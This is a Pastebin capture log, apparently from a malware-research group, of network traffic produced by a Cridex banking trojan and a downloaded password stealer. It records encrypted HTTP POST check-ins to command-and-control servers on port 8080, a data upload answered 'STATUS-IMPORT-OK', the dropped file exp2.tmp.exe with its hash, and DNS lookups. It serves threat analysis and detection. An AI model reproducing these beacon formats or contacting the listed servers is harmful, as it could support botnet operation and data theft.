SHARE
TWEET

Cridex + downloaded password stealer Network Traffic

MalwareMustDie Dec 15th, 2012 196 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. -----------details-internet traffic-------------------
  2. //Try to reach 208.87.243.18
  3. 192.168.7.84    208.87.243.18   TCP     sbl > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
  4. 208.87.243.18   192.168.7.84    TCP     http-alt > sbl [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
  5.  
  6. // a http POST command to 74.207.237.170:8080
  7. 192.168.7.84    74.207.237.170:8080     HTTP    POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  8.  
  9. POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  10. Accept: */*
  11. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
  12. Host: 74.207.237.170:8080
  13. Content-Length: 347
  14. Connection: Keep-Alive
  15. Cache-Control: no-cache
  16. ......dU..ZP....Y.yy..|4$R.".....u...+T..1L.;I.n6v39.+..
  17. DP.....O@xt,U..V|............c1..4~:
  18. R.E.........K.:+.....Z`.. y.....e.z...B.....^...bG..B.opBx0E\
  19. .....B..N.]....g.^......59.L.l.M.....>q)..Q...\5..p...M..q...
  20. W-.*...u.P.\p......2.K..HM7..~Z?vX.p.W..0.m....A?.u....=|<.\.'
  21. .......5._7'..46..G\.o" ....}...E..K...2eE..,.U.=.C....KtU....
  22. u..2.~@
  23.  
  24. 0000  00 a0 c9 22 b0 ee 00 12  f0 e9 3e 3e 08 00 45 00   ...".... ..>>..E.
  25. 0010  01 83 00 3f 40 00 80 06  f8 bf c0 a8 07 54 4a cf   ...?@... .....TJ.
  26. 0020  ed aa 04 11 1f 90 5a 54  91 b8 89 da 8f 5b 50 18   ......ZT .....[P.
  27. 0030  42 30 27 30 00 00 2e d7  f7 a7 03 ea 64 55 cf d6   B0'0.... ....dU..
  28. 0040  5a 50 e9 81 b2 b6 59 09  79 79 e6 b8 7c 34 24 52   ZP....Y. yy..|4$R
  29. 0050  a3 22 06 a4 11 86 ac 75  e0 08 b3 2b 54 12 a4 31   .".....u ...+T..1
  30.  :             :                      :                        :
  31. 0130  70 18 57 c8 97 30 ac 6d  93 08 fb a2 41 3f aa 75   p.W..0.m ....A?.u
  32. 0140  c7 83 e7 af 3d 7c 3c ef  5c 05 27 83 1e 2e d1 9b   ....=|<. \.'.....
  33. 0150  88 df 35 1f 5f 37 27 f1  f9 34 36 0e b0 47 5c b7   ..5._7'. .46..G\.
  34. 0160  6f 22 20 16 cb e9 9c 7d  01 98 08 45 9f a5 4b bf   o" ....} ...E..K.
  35. 0170  d5 90 32 65 45 e4 e9 2c  b0 55 1d 3d ca 43 e2 e8   ..2eE.., .U.=.C..
  36. 0180  d8 d5 4b 74 55 e1 f6 9e  8d 75 a1 92 32 1c 7e 40   ..KtU... .u..2.~@
  37. 0190  7c                                                 |              
  38.  
  39. // With the encryption reply long binary data...
  40.  
  41. Server: nginx/1.0.10
  42. Date: Sat, 15 Dec 2012 09:58:07 GMT
  43. Content-Type: text/html; charset=UTF-8
  44. Transfer-Encoding: chunked
  45. Connection: keep-alive
  46. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  47. Vary: Accept-Encoding
  48. f3b
  49. .}.%..k..o.-..U...........C..8.C.0...o...E.d... snip
  50. 2U...`......p_| ]X.$...B..A.F....}.snip
  51. .@C...4*j..|.\..%..xv-.....snip
  52. .1..x.....2.....`3....3.1..7......M.k..r-5s.8P=snip
  53. z.nT^MV..{+=3ym........Gj.3JV....x..xe{@.......snip
  54. [.UK.un2.>.W`..{.9'+.7*f..v.................F.M.snip
  55. v....[...M.O.......P2.....;..a\..^..Rv&..9P...xsnip
  56. n..Z...fG..t...1.|...`Vsnip
  57. ...#^&5.[...K...!i}...}.44...@...Zp`.."....*...snip
  58. %.(.....T .C.Md.#-.{q........G.&5+.N.,.R.....V>snip
  59. .g.{1...d..+t....T.g$....#..bMQ.f.5x.....pM'"a.snip
  60.    :
  61.    :snip
  62.    :
  63. .%......8{..6...J..$:?..E.+..C"...V'uZ1M..$Cy6}.1snip
  64. 3.!.i~..N.a..;^..+..a..[..J.~...7}....W...q.rR..n(."snip
  65. .<p....N....,..v......R...d..U_...?....k...-.....E%.snip
  66. ...a.AZ$......H...7r......
  67. 0
  68.  
  69. ////Some more comm try to connect to 132.248.49.112
  70.  
  71. 192.168.7.84    132.248.49.112  TCP     afrog > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
  72. 132.248.49.112  192.168.7.84    TCP     http-alt > afrog [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
  73.  
  74.  
  75. // At this point, in the %Temp% folder, the previous data was saved:
  76.  
  77.  
  78. FileName: exp2.tmp.exe
  79. tiimeStamp: 2012/12/15 18:58 122,880  
  80. MD5 ce7474646297ed818bb8ed48f50c7e1e
  81.  
  82.  
  83. // DNS requests to...
  84.  
  85. 112.49.248.132.in-addr.arpa web.ecologia.unam.mx
  86. 77.65.130.113.in-addr.arpa  ns.shinbiro.com..domain
  87.  
  88. 00000000  35 ea 01 00 00 01 00 00  00 00 00 00 03 31 31 32 5....... .....112
  89. 00000010  02 34 39 03 32 34 38 03  31 33 32 07 69 6e 2d 61 .49.248. 132.in-a
  90. 00000020  64 64 72 04 61 72 70 61  00 00 0c 00 01          ddr.arpa .....
  91.     00000000  35 ea 81 80 00 01 00 01  00 00 00 00 03 31 31 32 5....... .....112
  92.     00000010  02 34 39 03 32 34 38 03  31 33 32 07 69 6e 2d 61 .49.248. 132.in-a
  93.     00000020  64 64 72 04 61 72 70 61  00 00 0c 00 01 c0 0c 00 ddr.arpa ........
  94.     00000030  0c 00 01 00 00 1c 1f 00  16 03 77 65 62 08 65 63 ........ ..web.ec
  95.     00000040  6f 6c 6f 67 69 61 04 75  6e 61 6d 02 6d 78 00    ologia.u nam.mx.
  96. 0000002D  cb 61 01 00 00 01 00 00  00 00 00 00 02 37 37 02 .a...... .....77.
  97. 0000003D  36 35 03 31 33 30 03 31  31 33 07 69 6e 2d 61 64 65.130.1 13.in-ad
  98. 0000004D  64 72 04 61 72 70 61 00  00 0c 00 01             dr.arpa. ....
  99.     0000004F  cb 61 81 83 00 01 00 00  00 01 00 00 02 37 37 02 .a...... .....77.
  100.     0000005F  36 35 03 31 33 30 03 31  31 33 07 69 6e 2d 61 64 65.130.1 13.in-ad
  101.     0000006F  64 72 04 61 72 70 61 00  00 0c 00 01 c0 0f 00 06 dr.arpa. ........
  102.     0000007F  00 01 00 00 07 07 00 2e  02 6e 73 08 73 68 69 6e ........ .ns.shin
  103.     0000008F  62 69 72 6f 03 63 6f 6d  00 06 64 6f 6d 61 69 6e biro.com ..domain
  104.     0000009F  c0 3b 77 bf 64 79 00 00  2a 30 00 00 0e d8 00 12 .;w.dy.. *0......
  105.     000000AF  75 00 00 01 51 80                                u...Q.
  106.  
  107.  
  108. //Another POST command detected to 203.113.98.131:80
  109. POST /asp/intro.php HTTP/1.0
  110. Host: 203.113.98.131
  111. Accept: */*
  112. Accept-Encoding: identity, *;q=0
  113. Content-Length: 257
  114. Connection: close
  115. Content-Type: application/octet-stream
  116. Content-Encoding: binary
  117. User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
  118.  
  119. CRYPTED0...DK.V..aa..c.....PI%.^D.|2.s;.p..T=....*.........MX.../......../.;(.dl7).c..).......Jk.rO..e....!].......w
  120. .....}..5.+..6.SD4.>
  121. t......K...M........\..G...7V/..5].....|.....#.....=.P*^k.....b3cm.8..6..O...T....$|.......yb.~#...k0.|........o...[JD.HTTP/1.1 200 OK
  122.  
  123. Server: nginx/1.0.10
  124. Date: Sat, 15 Dec 2012 10:01:37 GMT
  125. Content-Type: text/html; charset=windows-1251
  126. Connection: close
  127. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  128. Vary: Accept-Encoding
  129. Content-Length: 16
  130.  
  131. STATUS-IMPORT-OK
  132.  
  133. // At this point the malware process exp2.tmp.exe was started....
  134.  
  135.  
  136.  
  137.  
  138.  
  139.  
  140. ---------------take 2---------------------
  141.  
  142. // send ACK packet (try to connect) to 74.207.237.170
  143.  
  144. 192.168.7.84    74.207.237.170  TCP     danf-ak2 > http-alt [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
  145.  
  146.  
  147. // send ping to 209.190.61.50
  148.  
  149. 209.190.61.50   192.168.7.84    ICMP    Time-to-live exceeded (Time to live exceeded in transit)
  150. 209.190.61.50   192.168.7.84    ICMP    Time-to-live exceeded (Time to live exceeded in transit)
  151.  
  152.  
  153. // make communications via HTTP/POST to 174.143.174.136:8080
  154.  
  155. //post....
  156. POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  157. Accept: */*
  158. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
  159. Host: 174.143.174.136:8080
  160. Content-Length: 408
  161. Connection: Keep-Alive
  162. Cache-Control: no-cache
  163. .m......(...P..0.w.j."...V....s.x.....c.....FH..?.. .I.t..`....OA&../.?$..._J..
  164. .....b...ws.'I..l..r........}....+`91.R..+..P.....7q..+Q...........-\g'G.6..l...rV..[.4S..K.5'!?...=.......S...2AkUh..S....b4..#....!.$.
  165. .+d;K..].>&....._g.w...i)..}.,.....f..YD.G.KI....9......rZ
  166. .~q.+......Sk.i...........t....!.m*......;..w."...[.'
  167. ..i...:..$..w.....X1gR+..U}b..U..../....(...K.FIAVR..4.....,...ujk...i....H..eHTTP/1.1 200 OK
  168.  
  169. // reply:
  170. Server: nginx/1.0.10
  171. Date: Sat, 15 Dec 2012 10:13:52 GMT
  172. Content-Type: text/html; charset=UTF-8
  173. Connection: keep-alive
  174. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  175. Vary: Accept-Encoding
  176. Content-Length: 165
  177. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
  178. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
  179. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
  180. 2U...`......\z#W.2.Pp_..NU..
  181.  
  182.  
  183. // post...
  184. POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  185. Accept: */*
  186. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
  187. Host: 174.143.174.136:8080
  188. Content-Length: 387
  189. Connection: Keep-Alive
  190. Cache-Control: no-cache
  191. ........b,.B..k'..`.9...r...7)@.~..^..E..o....y..YP .o...*gp......y..w........QF..^...J.......oV)vs..0eh....H....h7.K%Q,.c..I.U~S...\..?....g...Re,...\.?<.]2~.kw..M..t._.?.z.M<...h.-..Q.W.......Dg.3.1.."{Tf..RKw..9".T.......-."
  192. ..f(X..8..._...3*~+.%..Y.FH...\..:../.!.1G.I9..........o).........6*dXm.|-....$.6.. ..........8.....TJ...U....4TX.IdJ|b.=.e....h.G.....A...>.pC6.......]t..C'..HTTP/1.1 200 OK
  193.  
  194. //reply....
  195. Server: nginx/1.0.10
  196. Date: Sat, 15 Dec 2012 10:13:52 GMT
  197. Content-Type: text/html; charset=UTF-8
  198. Connection: keep-alive
  199. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  200. Vary: Accept-Encoding
  201. Content-Length: 165
  202. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
  203. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
  204. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
  205. 2U...`........X.'8...".~K..J.
  206.  
  207.  
  208.  
  209. // Try to esablish connection with 199.71.215.194      
  210.  
  211. 192.168.7.84    199.71.215.194  TCP     cognex-insight > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
  212. 199.71.215.194  192.168.7.84    TCP     http-alt > cognex-insight [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
  213.  
  214.  
  215. // Communication via HTTP/POST with 210.56.23.100:8080
  216.  
  217. POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  218. Accept: */*
  219. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
  220. Host: 210.56.23.100:8080
  221. Content-Length: 387
  222. Connection: Keep-Alive
  223. Cache-Control: no-cache
  224. ./Pl$,........*|.`..9...R{...B.....A...#.H..K.=e.......(.np...nn..y...M a.........2S...S..{|?....A.k..........
  225. ..Q#.g..~........S...\..?....g...Re,....s.I..]..,......@I.R..P.n....I;te.<&......-9.!......8j...R.......Y....*.D&..={pY.3.l".;......xn..g.N.....T..,>..rOJ!..D=.>.J..
  226. .(q..... ..P&....m.u6.....?....#.).W.........z....(.FF
  227. V.R
  228. ...-v!..38s)ab|....bKU..$..S..</.
  229. )4..1+...>.O.....HTTP/1.1 200 OK
  230.  
  231. Server: nginx/1.0.11
  232. Date: Sat, 15 Dec 2012 10:05:22 GMT
  233. Content-Type: text/html; charset=UTF-8
  234. Connection: keep-alive
  235. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  236. Vary: Accept-Encoding
  237. Content-Length: 165
  238. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
  239. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
  240. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
  241. 2U...`.........c.M..A..9.....
  242.  
  243. //try connect again with 132.248.49.112
  244.  
  245. 192.168.7.84    132.248.49.112  TCP     rdrmshc > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
  246. 132.248.49.112  192.168.7.84    TCP     http-alt > rdrmshc [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
  247.  
  248. // try to connect w/ 74.117.61.66
  249.  
  250. 192.168.7.84    74.117.61.66    TCP     socks > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
  251. 74.117.61.66    192.168.7.84    TCP     http-alt > socks [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
  252.  
  253.  
  254. Communicating via HTTP/POST w/210.56.23.100:8080
  255.  
  256. POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  257. Accept: */*
  258. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
  259. Host: 210.56.23.100:8080
  260. Content-Length: 387
  261. Connection: Keep-Alive
  262. Cache-Control: no-cache
  263. ./Pl$,........*|.`..9...R{...B.....A...#.H..K.=e.......(.np...nn..y...M a.........2S...S..{|?....A.k..........
  264. ..Q#.g..~........S...\..?....g...Re,....s.I..]..,......@I.R..P.n....I;te.<&......-9.!......8j...R.......Y....*.D&..={pY.3.l".;......xn..g.N.....T..,>..rOJ!..D=.>.J..
  265. .(q..... ..P&....m.u6.....?....#.).W.........z....(.FF
  266. V.R
  267. ...-v!..38s)ab|....bKU..$..S..</.
  268. )4..1+...>.O.....HTTP/1.1 200 OK
  269.  
  270. Server: nginx/1.0.11
  271. Date: Sat, 15 Dec 2012 10:05:22 GMT
  272. Content-Type: text/html; charset=UTF-8
  273. Connection: keep-alive
  274. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  275. Vary: Accept-Encoding
  276. Content-Length: 165
  277. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
  278. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
  279. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
  280. 2U...`.........c.M..A..9.....
  281.  
  282.  
  283. //Try to communicate w/ 173.192.229.36
  284.  
  285. 173.192.229.36  192.168.7.84    TCP     http-alt > mctp [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
  286. 192.168.7.84    173.192.229.36  TCP     mctp > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
  287.  
  288.  
  289. // Communication HTTTP/POST with 69.64.89.82:8080
  290.  
  291.  
  292. POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  293. Accept: */*
  294. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
  295. Host: 69.64.89.82:8080
  296. Content-Length: 387
  297. Connection: Keep-Alive
  298. Cache-Control: no-cache
  299. ..[.
  300. 8.|.
  301. . ...+...n.^.7.Mh=..R......Y....I.r$.O.....j..g..7l.4p#&....H.G5..P-.........ld}.l[......xd&..?
  302. ....)...>))'D;vgQ.....S...\..?....g...Re,.O..j.~y....+..?.S......a..5.....L.%.3v.........
  303. .......g.Xf...f..0.i`f..].E~\Z..4.G.....Nn.b..~......Dw.N...S.iW.......oI...W....t.!Hp.#8h..uAK...4L......j....f...]./
  304. .e...3k.o.b......T....[lm^8.X......l...."+9...2.v.\...GN..-....?.A".5wkRHTTP/1.1 200 OK
  305.  
  306. Server: nginx/1.0.10
  307. Date: Sat, 15 Dec 2012 02:51:22 GMT
  308. Content-Type: text/html; charset=UTF-8
  309. Connection: keep-alive
  310. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  311. Vary: Accept-Encoding
  312. Content-Length: 165
  313. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
  314. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
  315. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
  316. 2U...`......O..z.zj....>..;..
  317.  
  318.  
  319. // try to establish conn to: 173.224.221.135
  320.  
  321. 192.168.7.84    173.224.221.135 TCP     ltp-deepspace > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
  322. 173.224.221.135 192.168.7.84    TCP     http-alt > ltp-deepspace [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
  323.  
  324.  
  325. // try to estacblish conn to: 59.90.221.6
  326.  
  327. 192.168.7.84    59.90.221.6     TCP     ardus-trns > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
  328. 59.90.221.6     192.168.7.84    TCP     http-alt > ardus-trns [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
  329.  
  330.  
  331. // try to establish to 180.235.150.72
  332.  
  333. 192.168.7.84    180.235.150.72  TCP     sacred > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
  334. 180.235.150.72  192.168.7.84    TCP     http-alt > sacred [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
  335.  
  336. // Communicating via HTTP/POST to 123.49.61.59:8080
  337.  
  338. POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  339. Accept: */*
  340. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
  341. Host: 123.49.61.59:8080
  342. Content-Length: 387
  343. Connection: Keep-Alive
  344. Cache-Control: no-cache
  345. ...:..'....F..oP.Ka.2U.d....N~9..|.....,..
  346. ...
  347. 8....!'......Cr..,.8
  348. ..F[....z.%_...p.L..........C':.rq.t...U..H..7.b.........I.IS...\..?....g...Re,..C...V..:...D.....W.3..jO...Sh`j.4.,....A.#..zcm.G.....D.6..4/.........s4\>..G.dh...........-........).%j...-mG..#W.......&d.....g.Y..(.w.Vs&.rj...uAV....>^1.J.J..4.....M...Rp..%..n.k.....wt....x........}.z`..d.:.$
  349. ..9..:...;I\....G/.G....HTTP/1.1 200 OK
  350.  
  351. Server: nginx/1.0.10
  352. Date: Sat, 15 Dec 2012 10:29:47 GMT
  353. Content-Type: text/html; charset=UTF-8
  354. Connection: keep-alive
  355. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  356. Vary: Accept-Encoding
  357. Content-Length: 165
  358. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
  359. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
  360. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
  361. 2U...`.......^...R.L&F..x....POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  362.  
  363. Accept: */*
  364. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
  365. Host: 123.49.61.59:8080
  366. Content-Length: 387
  367. Connection: Keep-Alive
  368. Cache-Control: no-cache
  369. g..7...:R...g\.....F......@..8B..w...}.28..^....})u...ZR.exi.f......h..T..s..j..4..'m.E....SZ?.R@f.
  370. .l...(>..U.~N=;..Z......&...S...\..?....g...Re,.,.".+..y.&U..X.f...G7J.$ s
  371. ..7#?..3..b.UC.]....`.-.,.......v....C......F9'.&...Q.L..A..6+..N.Vx.......+.R..o.l...%.Q.qSR.W..IBpoy...Y. n..7b
  372. ..jW.qO.*.j.'..f)I_7.
  373. R...5.0AY7....m..X...>..\M.QN.p.r.P.&f......Y.0.'..!e..j.s.-w>.HwL..j.0..[.
  374. HTTP/1.1 200 OK
  375.  
  376. Server: nginx/1.0.10
  377. Date: Sat, 15 Dec 2012 10:30:01 GMT
  378. Content-Type: text/html; charset=UTF-8
  379. Connection: keep-alive
  380. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  381. Vary: Accept-Encoding
  382. Content-Length: 165
  383. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
  384. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
  385. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
  386. 2U...`......,.&.3.."cz@..[.a.
  387.  
  388.  
  389. // Communicating with HTTP/POST with 123.49.61.59:8080
  390.  
  391. POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  392. Accept: */*
  393. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
  394. Host: 123.49.61.59:8080
  395. Content-Length: 387
  396. Connection: Keep-Alive
  397. Cache-Control: no-cache
  398. .K.Vn%d...;.Q6K.vq..)...T...e.,....c.q.K..............-.....t:.Hy(.....K.....t.d.......L,..7...}%..h&...?..)..*.@....Hg...ys.$A.S...\..?....g...Re,....H1ij..b.KC.....DJ....y.C2.I.0....#.4
  399. ...H...hi....~.T%5.M*v..z`..v....r..b....K.yQ...Se..5....Z2.r.+...H9..8.^A..>....".....]..&....\...`"/r...:e.mO..w.4..7...Q..!...Ll..(..I.M>x.\.Y>...ET...=.S.'.....(..(
  400. ...4Q.F.LN.......AI.&.*.w.u4..HTTP/1.1 200 OK
  401.  
  402. Server: nginx/1.0.10
  403. Date: Sat, 15 Dec 2012 10:29:45 GMT
  404. Content-Type: text/html; charset=UTF-8
  405. Connection: keep-alive
  406. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  407. Vary: Accept-Encoding
  408. Content-Length: 165
  409. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
  410. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
  411. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
  412. 2U...`.........X)myU.>.^....JPOST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  413.  
  414. Accept: */*
  415. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
  416. Host: 123.49.61.59:8080
  417. Content-Length: 387
  418. Connection: Keep-Alive
  419. Cache-Control: no-cache
  420. ...:..'....F..oP.Ka.2U.d....N~9..|.....,..
  421. ...
  422. 8....!'......Cr..,.8
  423. ..F[....z.%_...p.L..........C':.rq.t...U..H..7.b.........I.IS...\..?....g...Re,..C...V..:...D.....W.3..jO...Sh`j.4.,....A.#..zcm.G.....D.6..4/.........s4\>..G.dh...........-........).%j...-mG..#W.......&d.....g.Y..(.w.Vs&.rj...uAV....>^1.J.J..4.....M...Rp..%..n.k.....wt....x........}.z`..d.:.$
  424. ..9..:...;I\....G/.G....HTTP/1.1 200 OK
  425.  
  426. Server: nginx/1.0.10
  427. Date: Sat, 15 Dec 2012 10:29:47 GMT
  428. Content-Type: text/html; charset=UTF-8
  429. Connection: keep-alive
  430. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  431. Vary: Accept-Encoding
  432. Content-Length: 165
  433. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
  434. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
  435. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
  436. 2U...`.......^...R.L&F..x....POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  437.  
  438. Accept: */*
  439. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
  440. Host: 123.49.61.59:8080
  441. Content-Length: 387
  442. Connection: Keep-Alive
  443. Cache-Control: no-cache
  444. g..7...:R...g\.....F......@..8B..w...}.28..^....})u...ZR.exi.f......h..T..s..j..4..'m.E....SZ?.R@f.
  445. .l...(>..U.~N=;..Z......&...S...\..?....g...Re,.,.".+..y.&U..X.f...G7J.$ s
  446. ..7#?..3..b.UC.]....`.-.,.......v....C......F9'.&...Q.L..A..6+..N.Vx.......+.R..o.l...%.Q.qSR.W..IBpoy...Y. n..7b
  447. ..jW.qO.*.j.'..f)I_7.
  448. R...5.0AY7....m..X...>..\M.QN.p.r.P.&f......Y.0.'..!e..j.s.-w>.HwL..j.0..[.
  449. HTTP/1.1 200 OK
  450.  
  451. Server: nginx/1.0.10
  452. Date: Sat, 15 Dec 2012 10:30:01 GMT
  453. Content-Type: text/html; charset=UTF-8
  454. Connection: keep-alive
  455. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  456. Vary: Accept-Encoding
  457. Content-Length: 165
  458. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
  459. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
  460. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
  461. 2U...`......,.&.3.."cz@..[.a.
  462.  
  463.  
  464. //Try to establish conn to: 113.130.65.77
  465.  
  466. 192.168.7.84    113.130.65.77   TCP     hpvmmcontrol > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
  467. 113.130.65.77   192.168.7.84    TCP     http-alt > hpvmmcontrol [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
  468.  
  469. //Try to establish conn to: 180.235.150.72
  470.  
  471. 802     795.966247      192.168.7.84    180.235.150.72  TCP     saphostctrls > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
  472. 803     796.070637      180.235.150.72  192.168.7.84    TCP     http-alt > saphostctrls [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
  473.  
  474. // making communication via HTTP/POST to 69.64.89.82:8080
  475.  
  476.  
  477. POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  478. Accept: */*
  479. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
  480. Host: 69.64.89.82:8080
  481. Content-Length: 387
  482. Connection: Keep-Alive
  483. Cache-Control: no-cache
  484. .X...j.K.!L.C..............3.8.|...........w..9...W
  485. .K.Q....se.....k....y.;..6=$..%%.O....k'....iu|......=.?u..]%....?../...\...S...\..?....g...Re,.]...n.G.j..0O.X.rQ
  486. l...[.h.........-.zR..J\...".Q
  487. w..Yv..}:n..R.....6z.S0......_+.sXx....3n!.w..]k.o...d;^......b...8.h8.g.a...C.|C...m...4.M..[
  488. .T..3!k..T.U=1N.~d.c..C.m....
  489. ..}..&..y_5..u
  490. ..Z...Z4;.u@..|A..&..G|}._.\.L.....A....u..|`..'.
  491.  
  492. HTTP/1.1 200 OK
  493. Server: nginx/1.0.10
  494. Date: Sat, 15 Dec 2012 02:55:11 GMT
  495. Content-Type: text/html; charset=UTF-8
  496. Connection: keep-alive
  497. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  498. Vary: Accept-Encoding
  499. Content-Length: 165
  500. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
  501. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
  502. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
  503. 2U...`......]...v.T.v..%s.\.$
  504.  
  505. -----------------------------internet data ends--------------------
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top